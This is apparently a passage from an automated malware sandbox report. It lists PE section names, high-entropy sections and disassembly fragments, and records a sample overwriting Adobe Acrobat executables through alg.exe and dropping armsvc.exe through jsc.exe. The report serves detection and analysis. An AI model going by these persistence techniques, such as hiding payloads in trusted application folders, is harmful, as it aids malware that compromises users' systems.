Source: notification_click_helper.exe.7.dr	Static PE information: section name: CPADinfo
Source: notification_click_helper.exe.7.dr	Static PE information: section name: _RDATA
Source: notification_click_helper.exe.7.dr	Static PE information: section name: malloc_h
Source: pwahelper.exe.7.dr	Static PE information: section name: .00cfg
Source: pwahelper.exe.7.dr	Static PE information: section name: .gxfg
Source: pwahelper.exe.7.dr	Static PE information: section name: .retplne
Source: pwahelper.exe.7.dr	Static PE information: section name: _RDATA
Source: pwahelper.exe.7.dr	Static PE information: section name: malloc_h
Source: msedge_proxy.exe0.7.dr	Static PE information: section name: .00cfg
Source: msedge_proxy.exe0.7.dr	Static PE information: section name: .gxfg
Source: msedge_proxy.exe0.7.dr	Static PE information: section name: .retplne
Source: msedge_proxy.exe0.7.dr	Static PE information: section name: _RDATA
Source: msedge_proxy.exe0.7.dr	Static PE information: section name: malloc_h
Source: pwahelper.exe0.7.dr	Static PE information: section name: .00cfg
Source: pwahelper.exe0.7.dr	Static PE information: section name: .gxfg
Source: pwahelper.exe0.7.dr	Static PE information: section name: .retplne
Source: pwahelper.exe0.7.dr	Static PE information: section name: _RDATA
Source: pwahelper.exe0.7.dr	Static PE information: section name: malloc_h
Source: MicrosoftEdgeUpdate.exe.7.dr	Static PE information: section name: .didat
Source: Acrobat.exe.7.dr	Static PE information: section name: .didat
Source: Acrobat.exe.7.dr	Static PE information: section name: _RDATA
Source: AcroCEF.exe.7.dr	Static PE information: section name: .didat
Source: AcroCEF.exe.7.dr	Static PE information: section name: _RDATA
Source: SingleClientServicesUpdater.exe.7.dr	Static PE information: section name: .didat
Source: SingleClientServicesUpdater.exe.7.dr	Static PE information: section name: _RDATA
Source: MicrosoftEdgeUpdateBroker.exe.7.dr	Static PE information: section name: .didat
Source: MicrosoftEdgeUpdateComRegisterShell64.exe.7.dr	Static PE information: section name: .didat
Source: MicrosoftEdgeUpdateComRegisterShell64.exe.7.dr	Static PE information: section name: _RDATA
Source: MicrosoftEdgeUpdateCore.exe.7.dr	Static PE information: section name: .didat
Source: MicrosoftEdgeUpdateOnDemand.exe.7.dr	Static PE information: section name: .didat
Source: MicrosoftEdgeUpdateSetup.exe.7.dr	Static PE information: section name: .didat

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Code function: 5_2_00402A57 push esp; retf	5_2_00402A58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Code function: 5_2_0040513D push 5DBA3BDAh; iretd	5_2_00405151
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Code function: 5_2_03154B70 push 03154C73h; ret	5_2_03154B9C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Code function: 5_2_03154B70 push 03154E86h; ret	5_2_03154C24
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Code function: 5_2_03154B70 push 03154E27h; ret	5_2_03154EC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Code function: 5_2_0317CBD0 push 0317C329h; ret	5_2_0317BFF5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Code function: 5_2_0317CBD0 push 0317C05Bh; ret	5_2_0317C0AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Code function: 5_2_0317CBD0 push 0317C416h; ret	5_2_0317C14F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Code function: 5_2_0317CBD0 push 0317C6BEh; ret	5_2_0317C196
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Code function: 5_2_0317CBD0 push 0317C439h; ret	5_2_0317C1AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Code function: 5_2_0317CBD0 push 0317C599h; ret	5_2_0317C1E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Code function: 5_2_0317CBD0 push 0317C471h; ret	5_2_0317C1FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Code function: 5_2_0317CBD0 push 0317BECFh; ret	5_2_0317C2FC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Code function: 5_2_0317CBD0 push 0317C6CDh; ret	5_2_0317C390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Code function: 5_2_0317CBD0 push 0317C2FFh; ret	5_2_0317C3AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Code function: 5_2_0317CBD0 push 0317C532h; ret	5_2_0317C45A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Code function: 5_2_0317CBD0 push 0317C23Ch; ret	5_2_0317C597
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Code function: 5_2_0317CBD0 push 0317C08Dh; ret	5_2_0317C639
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Code function: 5_2_0317CBD0 push 0317C63Eh; ret	5_2_0317C67B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Code function: 5_2_0317CBD0 push 0317C198h; ret	5_2_0317C72A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Code function: 5_2_0317CBD0 push 0317CC2Ch; ret	5_2_0317CBE3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Code function: 5_2_0317CBD0 push 0317CBFEh; ret	5_2_0317CC1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Code function: 5_2_0317CBD0 push 0317CBE6h; ret	5_2_0317CC40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Code function: 5_2_0315520C push 0315528Fh; ret	5_2_0315522D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Code function: 5_2_0315B180 push 0315B0CAh; ret	5_2_0315B061
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Code function: 5_2_0315B180 push 0315B30Dh; ret	5_2_0315B1E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Code function: 5_2_0315B180 push 0315B2F2h; ret	5_2_0315B262
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Code function: 5_2_0315B180 push 0315B255h; ret	5_2_0315B2ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Code function: 5_2_0315B180 push 0315B2D0h; ret	5_2_0315B346
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Code function: 5_2_0315B180 push 0315B37Fh; ret	5_2_0315B3B7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Code function: 5_2_03155F10 push 03155D94h; ret	5_2_03155DBA

Source: AppVClient.exe.5.dr	Static PE information: section name: .reloc entropy: 7.936502819305334
Source: minidump-analyzer.exe.7.dr	Static PE information: section name: .reloc entropy: 7.9354644140656045
Source: 117.0.5938.132_chrome_installer.exe.7.dr	Static PE information: section name: .reloc entropy: 7.93475143078454
Source: Aut2exe.exe.7.dr	Static PE information: section name: .rsrc entropy: 7.800649908612806
Source: Aut2exe_x64.exe.7.dr	Static PE information: section name: .rsrc entropy: 7.80049935503611
Source: elevation_service.exe.7.dr	Static PE information: section name: .reloc entropy: 7.943928515188084
Source: elevation_service.exe0.7.dr	Static PE information: section name: .reloc entropy: 7.945943205943132
Source: 7zFM.exe.7.dr	Static PE information: section name: .reloc entropy: 7.932128093038141
Source: 7zG.exe.7.dr	Static PE information: section name: .reloc entropy: 7.92768306755845
Source: identity_helper.exe.7.dr	Static PE information: section name: .reloc entropy: 7.940742343236918
Source: setup.exe.7.dr	Static PE information: section name: .reloc entropy: 7.944718765405369
Source: msedgewebview2.exe.7.dr	Static PE information: section name: .reloc entropy: 7.93655622099432
Source: msedge_proxy.exe.7.dr	Static PE information: section name: .reloc entropy: 7.942254804650595
Source: msedge_pwa_launcher.exe.7.dr	Static PE information: section name: .reloc entropy: 7.946259500515891
Source: notification_click_helper.exe.7.dr	Static PE information: section name: .reloc entropy: 7.944011774464081
Source: pwahelper.exe.7.dr	Static PE information: section name: .reloc entropy: 7.9408907577663825
Source: msedge_proxy.exe0.7.dr	Static PE information: section name: .reloc entropy: 7.942259834195026
Source: pwahelper.exe0.7.dr	Static PE information: section name: .reloc entropy: 7.940885500679113
Source: Acrobat.exe.7.dr	Static PE information: section name: .reloc entropy: 7.940538524621406
Source: AcroCEF.exe.7.dr	Static PE information: section name: .reloc entropy: 7.937556653931293
Source: SingleClientServicesUpdater.exe.7.dr	Static PE information: section name: .reloc entropy: 7.943691989904792
Source: MicrosoftEdgeUpdateSetup.exe.7.dr	Static PE information: section name: .reloc entropy: 7.939181485355852

Persistence and Installation Behavior

Creates files in the system32 config directory

Source: C:\Windows\System32\alg.exe

File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\3b4327877d6689f.bin

Jump to behavior

Drops executable to a common third party application directory

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
